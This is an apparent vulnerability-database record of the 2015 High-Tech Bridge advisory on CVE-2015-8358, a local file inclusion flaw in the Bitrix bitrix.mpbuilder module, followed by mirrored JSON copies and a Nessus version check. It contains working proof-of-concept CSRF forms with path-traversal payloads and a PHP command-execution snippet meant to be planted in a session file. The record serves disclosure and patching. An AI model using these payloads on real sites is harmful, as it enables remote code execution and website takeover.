Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion
2015-12-14T00:00:00
ID EDB-ID:38975 Type exploitdb Reporter High-Tech Bridge SA Modified 2015-12-14T00:00:00
Description
Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion. CVE-2015-8358. Webapps exploit for php platform
Advisory ID: HTB23281
Product: bitrix.mpbuilder Bitrix module
Vendor: www.1c-bitrix.ru
Vulnerable Version(s): 1.0.10 and probably prior
Tested Version: 1.0.10
Advisory Publication: November 18, 2015 [without technical details]
Vendor Notification: November 18, 2015
Vendor Patch: November 25, 2015
Public Disclosure: December 9, 2015
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8358
Risk Level: Critical
CVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website.
Access to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector.
The vulnerability exists due to insufficient filtration of "work[]" HTTP POST parameter in "/bitrix/admin/bitrix.mpbuilder_step2.php" script before using it in the include() PHP function. A remote attacker can include and execute arbitrary local file on the target system.
A simple exploit below will include and execute "/tmp/file" file:
<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog" method="post" name="main">
<input type="hidden" name="save" value="1">
<input type="hidden" name="work[/../../../../../../../../../../../../../../../../../../tmp/file]" value="1">
<input value="submit" id="btn" type="submit" />
</form>
In a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change name in his profile to <? exec($_POST['cmd']); ?> and create a CSRF exploit that will pass arbitrary commands and execute them on the system. The PoC code below executes /bin/ls command using previously created session file with malicious "NAME" value:
<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog" method="post" name="main">
<input type="hidden" name="save" value="1">
<input type="hidden" name="work[/../../../../../../../../../../../../../../../../../../tmp/sess_[SESSION_ID]]" value="1">
<input type="hidden" name="cmd" value="ls">
<input value="submit" id="btn" type="submit" />
</form>
-----------------------------------------------------------------------------------------------
Solution:
Update to bitrix.mpbuilder module 1.0.12
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23281 - https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in bitrix.mpbuilder Bitrix module
[2] bitrix.mpbuilder - https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module for software developers.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVEÂŽ is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWebÂŽ SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
{"id": "EDB-ID:38975", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion", "description": "Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion. CVE-2015-8358. Webapps exploit for php platform", "published": "2015-12-14T00:00:00", "modified": "2015-12-14T00:00:00", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/38975/", "reporter": "High-Tech Bridge SA", "references": [], "cvelist": ["CVE-2015-8358"], "lastseen": "2016-02-04T09:14:13", "viewCount": 42, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2016-02-04T09:14:13", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-8358"]}, {"type": "htbridge", "idList": ["HTB23281"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:175C324ED11CF2F9EC3DF9AB905DAF2B"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:134766"]}, {"type": "zdt", "idList": ["1337DAY-ID-24705"]}, {"type": "nessus", "idList": ["BITRIX_MPBUILDER_1_0_12_MODULE.NASL"]}], "modified": "2016-02-04T09:14:13", "rev": 2}, "vulnersScore": 4.3}, "sourceHref": "https://www.exploit-db.com/download/38975/", "sourceData": "Advisory ID: HTB23281\r\nProduct: bitrix.mpbuilder Bitrix module\r\nVendor: www.1c-bitrix.ru\r\nVulnerable Version(s): 1.0.10 and probably prior\r\nTested Version: 1.0.10\r\nAdvisory Publication: November 18, 2015 [without technical details]\r\nVendor Notification: November 18, 2015 \r\nVendor Patch: November 25, 2015 \r\nPublic Disclosure: December 9, 2015 \r\nVulnerability Type: PHP File Inclusion [CWE-98]\r\nCVE Reference: CVE-2015-8358\r\nRisk Level: Critical \r\nCVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website.\r\n\r\nAccess to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector.\r\n \r\nThe vulnerability exists due to insufficient filtration of \"work[]\" HTTP POST parameter in \"/bitrix/admin/bitrix.mpbuilder_step2.php\" script before using it in the include() PHP function. A remote attacker can include and execute arbitrary local file on the target system.\r\n\r\nA simple exploit below will include and execute \"/tmp/file\" file:\r\n\r\n<form action=\"http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"save\" value=\"1\">\r\n<input type=\"hidden\" name=\"work[/../../../../../../../../../../../../../../../../../../tmp/file]\" value=\"1\">\r\n<input value=\"submit\" id=\"btn\" type=\"submit\" />\r\n</form>\r\n\r\n\r\nIn a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change name in his profile to <? exec($_POST['cmd']); ?> and create a CSRF exploit that will pass arbitrary commands and execute them on the system. The PoC code below executes /bin/ls command using previously created session file with malicious \"NAME\" value:\r\n\r\n\r\n<form action=\"http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"save\" value=\"1\">\r\n<input type=\"hidden\" name=\"work[/../../../../../../../../../../../../../../../../../../tmp/sess_[SESSION_ID]]\" value=\"1\">\r\n<input type=\"hidden\" name=\"cmd\" value=\"ls\">\r\n<input value=\"submit\" id=\"btn\" type=\"submit\" />\r\n</form>\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to bitrix.mpbuilder module 1.0.12\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23281 - https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in bitrix.mpbuilder Bitrix module\r\n[2] bitrix.mpbuilder - https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module for software developers. \r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00c2\u017d is a dictionary of publicly known information security vulnerabilities and exposures.\r\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\r\n[5] ImmuniWeb\u00c2\u017d SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "osvdbidlist": ["130820"]}
{"cve": [{"lastseen": "2021-02-02T06:21:30", "description": "Directory traversal vulnerability in the bitrix.mpbuilder module before 1.0.12 for Bitrix allows remote administrators to include and execute arbitrary local files via a .. (dot dot) in the element name of the \"work\" array parameter to admin/bitrix.mpbuilder_step2.php.", "edition": 6, "cvss3": {}, "published": "2015-12-16T21:59:00", "title": "CVE-2015-8358", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8358"], "modified": "2018-10-09T19:58:00", "cpe": ["cpe:/a:bitrix:mpbuilder:1.0.11"], "id": "CVE-2015-8358", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8358", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:bitrix:mpbuilder:1.0.11:*:*:*:*:bitrix:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:14:31", "description": "", "published": "2015-12-11T00:00:00", "type": "packetstorm", "title": "bitrix.mpbuilder Bitrix 1.0.10 Local File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8358"], "modified": "2015-12-11T00:00:00", "id": "PACKETSTORM:134766", "href": "https://packetstormsecurity.com/files/134766/bitrix.mpbuilder-Bitrix-1.0.10-Local-File-Inclusion.html", "sourceData": "`Advisory ID: HTB23281 \nProduct: bitrix.mpbuilder Bitrix module \nVendor: www.1c-bitrix.ru \nVulnerable Version(s): 1.0.10 and probably prior \nTested Version: 1.0.10 \nAdvisory Publication: November 18, 2015 [without technical details] \nVendor Notification: November 18, 2015 \nVendor Patch: November 25, 2015 \nPublic Disclosure: December 9, 2015 \nVulnerability Type: PHP File Inclusion [CWE-98] \nCVE Reference: CVE-2015-8358 \nRisk Level: Critical \nCVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H] \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website. \n \nAccess to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector. \n \nThe vulnerability exists due to insufficient filtration of \"work[]\" HTTP POST parameter in \"/bitrix/admin/bitrix.mpbuilder_step2.php\" script before using it in the include() PHP function. A remote attacker can include and execute arbitrary local file on the target system. \n \nA simple exploit below will include and execute \"/tmp/file\" file: \n \n<form action=\"http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"save\" value=\"1\"> \n<input type=\"hidden\" name=\"work[/../../../../../../../../../../../../../../../../../../tmp/file]\" value=\"1\"> \n<input value=\"submit\" id=\"btn\" type=\"submit\" /> \n</form> \n \n \nIn a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change name in his profile to <? exec($_POST['cmd']); ?> and create a CSRF exploit that will pass arbitrary commands and execute them on the system. The PoC code below executes /bin/ls command using previously created session file with malicious \"NAME\" value: \n \n \n<form action=\"http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"save\" value=\"1\"> \n<input type=\"hidden\" name=\"work[/../../../../../../../../../../../../../../../../../../tmp/sess_[SESSION_ID]]\" value=\"1\"> \n<input type=\"hidden\" name=\"cmd\" value=\"ls\"> \n<input value=\"submit\" id=\"btn\" type=\"submit\" /> \n</form> \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to bitrix.mpbuilder module 1.0.12 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23281 - https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in bitrix.mpbuilder Bitrix module \n[2] bitrix.mpbuilder - https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module for software developers. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134766/bitrixmpbuilder-lfi.txt"}], "htbridge": [{"lastseen": "2020-12-24T11:39:01", "bulletinFamily": "software", "cvelist": ["CVE-2015-8358"], "description": "High-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website. \n \nAccess to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector. \n \nThe vulnerability exists due to insufficient filtration of \"work[]\" HTTP POST parameter in \"/bitrix/admin/bitrix.mpbuilder_step2.php\" script before using it in the include() PHP function. A remote attacker can include and execute arbitrary local file on the target system. \n \nA simple exploit below will include and execute \"/tmp/file\" file: \n<form action=\"http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog \" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"save\" value=\"1\"> \n<input type=\"hidden\" name=\"work[/../../../../../../../../../../../../../../../../../../tmp/file]\" value=\"1\"> \n<input value=\"submit\" id=\"btn\" type=\"submit\" /> \n</form> \n \nIn a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change name in his profile to <? exec($_POST['cmd']); ?> and create a CSRF exploit that will pass arbitrary commands and execute them on the system. The PoC code below executes /bin/ls command using previously created session file with malicious \"NAME\" value: \n \n<form action=\"http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog \" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"save\" value=\"1\"> \n<input type=\"hidden\" name=\"work[/../../../../../../../../../../../../../../../../../../tmp/sess_[ SESSION_ID]]\" value=\"1\"> \n<input type=\"hidden\" name=\"cmd\" value=\"ls\"> \n<input value=\"submit\" id=\"btn\" type=\"submit\" /> \n</form> \n\n", "modified": "2015-12-01T00:00:00", "published": "2015-11-18T00:00:00", "id": "HTB23281", "href": "https://www.htbridge.com/advisory/HTB23281", "type": "htbridge", "title": "PHP File Inclusion in bitrix.mpbuilder Bitrix Module", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-06T21:10:33", "edition": 2, "description": "bitrix.mpbuilder Bitrix module version 1.0.10 suffers from a local file inclusion vulnerability.", "published": "2015-12-11T00:00:00", "type": "zdt", "title": "bitrix.scan Bitrix 1.0.3 Path Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8358"], "modified": "2015-12-11T00:00:00", "id": "1337DAY-ID-24705", "href": "https://0day.today/exploit/description/24705", "sourceData": "Product: bitrix.mpbuilder Bitrix module\r\nVendor: www.1c-bitrix.ru\r\nVulnerable Version(s): 1.0.10 and probably prior\r\nTested Version: 1.0.10\r\nAdvisory Publication: November 18, 2015 [without technical details]\r\nVendor Notification: November 18, 2015 \r\nVendor Patch: November 25, 2015 \r\nPublic Disclosure: December 9, 2015 \r\nVulnerability Type: PHP File Inclusion [CWE-98]\r\nCVE Reference: CVE-2015-8358\r\nRisk Level: Critical \r\nCVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website.\r\n\r\nAccess to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector.\r\n \r\nThe vulnerability exists due to insufficient filtration of \"work[]\" HTTP POST parameter in \"/bitrix/admin/bitrix.mpbuilder_step2.php\" script before using it in the include() PHP function. A remote attacker can include and execute arbitrary local file on the target system.\r\n\r\nA simple exploit below will include and execute \"/tmp/file\" file:\r\n\r\n<form action=\"http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"save\" value=\"1\">\r\n<input type=\"hidden\" name=\"work[/../../../../../../../../../../../../../../../../../../tmp/file]\" value=\"1\">\r\n<input value=\"submit\" id=\"btn\" type=\"submit\" />\r\n</form>\r\n\r\n\r\nIn a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change name in his profile to <? exec($_POST['cmd']); ?> and create a CSRF exploit that will pass arbitrary commands and execute them on the system. The PoC code below executes /bin/ls command using previously created session file with malicious \"NAME\" value:\r\n\r\n\r\n<form action=\"http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog\" method=\"post\" name=\"main\">\r\n<input type=\"hidden\" name=\"save\" value=\"1\">\r\n<input type=\"hidden\" name=\"work[/../../../../../../../../../../../../../../../../../../tmp/sess_[SESSION_ID]]\" value=\"1\">\r\n<input type=\"hidden\" name=\"cmd\" value=\"ls\">\r\n<input value=\"submit\" id=\"btn\" type=\"submit\" />\r\n</form>\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpdate to bitrix.mpbuilder module 1.0.12\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24705"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:06", "description": "\nBitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion", "edition": 1, "published": "2015-12-14T00:00:00", "title": "Bitrix bitrix.mpbuilder Module 1.0.10 - Local File Inclusion", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-8358"], "modified": "2015-12-14T00:00:00", "id": "EXPLOITPACK:175C324ED11CF2F9EC3DF9AB905DAF2B", "href": "", "sourceData": "Advisory ID: HTB23281\nProduct: bitrix.mpbuilder Bitrix module\nVendor: www.1c-bitrix.ru\nVulnerable Version(s): 1.0.10 and probably prior\nTested Version: 1.0.10\nAdvisory Publication: November 18, 2015 [without technical details]\nVendor Notification: November 18, 2015 \nVendor Patch: November 25, 2015 \nPublic Disclosure: December 9, 2015 \nVulnerability Type: PHP File Inclusion [CWE-98]\nCVE Reference: CVE-2015-8358\nRisk Level: Critical \nCVSSv3 Base Score: 9.6 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H]\nSolution Status: Fixed by Vendor\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n\n-----------------------------------------------------------------------------------------------\n\nAdvisory Details:\n\nHigh-Tech Bridge Security Research Lab discovered vulnerability in bitrix.mpbuilder Bitrix module, which can be exploited to include and execute arbitrary PHP file on the target system with privileges of the web server. The attacker will be able to execute arbitrary system commands and gain complete control over the website.\n\nAccess to vulnerable modules requires administrative privileges, however the vulnerability can be used by anonymous users via CSRF vector.\n \nThe vulnerability exists due to insufficient filtration of \"work[]\" HTTP POST parameter in \"/bitrix/admin/bitrix.mpbuilder_step2.php\" script before using it in the include() PHP function. A remote attacker can include and execute arbitrary local file on the target system.\n\nA simple exploit below will include and execute \"/tmp/file\" file:\n\n<form action=\"http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog\" method=\"post\" name=\"main\">\n<input type=\"hidden\" name=\"save\" value=\"1\">\n<input type=\"hidden\" name=\"work[/../../../../../../../../../../../../../../../../../../tmp/file]\" value=\"1\">\n<input value=\"submit\" id=\"btn\" type=\"submit\" />\n</form>\n\n\nIn a real-world scenario an attacker can use session files to execute arbitrary PHP code. For example, an attacker can change name in his profile to <? exec($_POST['cmd']); ?> and create a CSRF exploit that will pass arbitrary commands and execute them on the system. The PoC code below executes /bin/ls command using previously created session file with malicious \"NAME\" value:\n\n\n<form action=\"http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog\" method=\"post\" name=\"main\">\n<input type=\"hidden\" name=\"save\" value=\"1\">\n<input type=\"hidden\" name=\"work[/../../../../../../../../../../../../../../../../../../tmp/sess_[SESSION_ID]]\" value=\"1\">\n<input type=\"hidden\" name=\"cmd\" value=\"ls\">\n<input value=\"submit\" id=\"btn\" type=\"submit\" />\n</form>\n\n\n\n-----------------------------------------------------------------------------------------------\n\nSolution:\n\nUpdate to bitrix.mpbuilder module 1.0.12\n\n-----------------------------------------------------------------------------------------------\n\nReferences:\n\n[1] High-Tech Bridge Advisory HTB23281 - https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in bitrix.mpbuilder Bitrix module\n[2] bitrix.mpbuilder - https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module for software developers. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.\n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.\n\n-----------------------------------------------------------------------------------------------\n\nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-03-01T01:25:27", "description": "The version of the Bitrix bitrix.mpbuilder module running on the\nremote web server is prior to 1.0.12. It is, therefore, affected by a\npath traversal vulnerability due to a failure to properly sanitize\nuser-supplied input to the 'work[]' parameter passed to the\n/bitrix/admin/bitrix.mpbuilder_step2.php script. An authenticated,\nremote attacker can exploit this, via a specially crafted HTTP POST\nrequest, to include and execute arbitrary local files on the host.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported module version number.", "edition": 27, "cvss3": {"score": 7.2, "vector": "AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-02T00:00:00", "title": "Bitrix bitrix.mpbuilder Module < 1.0.12 bitrix.mpbuilder_step2.php 'work[]' Path Traversal File Inclusion", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8358"], "modified": "2021-03-02T00:00:00", "cpe": ["x-cpe:/a:bitrix:bitrix", "cpe:/a:bitrix:mpbuilder"], "id": "BITRIX_MPBUILDER_1_0_12_MODULE.NASL", "href": "https://www.tenable.com/plugins/nessus/99931", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99931);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/06/13 18:56:26\");\n\n script_cve_id(\"CVE-2015-8358\");\n script_bugtraq_id(79774);\n script_xref(name:\"EDB-ID\", value:\"38975\");\n script_xref(name:\"IAVA\", value:\"2017-A-0129\");\n\n script_name(english:\"Bitrix bitrix.mpbuilder Module < 1.0.12 bitrix.mpbuilder_step2.php 'work[]' Path Traversal File Inclusion\");\n script_summary(english:\"Checks the version of bitrix.mpbuilder module.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PHP application running on the remote web server contains a module\nthat is affected by a path traversal vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Bitrix bitrix.mpbuilder module running on the\nremote web server is prior to 1.0.12. It is, therefore, affected by a\npath traversal vulnerability due to a failure to properly sanitize\nuser-supplied input to the 'work[]' parameter passed to the\n/bitrix/admin/bitrix.mpbuilder_step2.php script. An authenticated,\nremote attacker can exploit this, via a specially crafted HTTP POST\nrequest, to include and execute arbitrary local files on the host.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported module version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.htbridge.com/advisory/HTB23281\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Bitrix bitrix.mpbuilder module version 1.0.12 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:bitrix:bitrix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:bitrix:mpbuilder\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"bitrix_detect.nbin\");\n script_require_keys(\"www/PHP\", \"installed_sw/Bitrix\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"http.inc\");\n\napp = \"bitrix.mpbuilder for Bitrix\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:443, php:TRUE);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\nconstraints = [{ \"fixed_version\" : \"1.0.12\" }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}
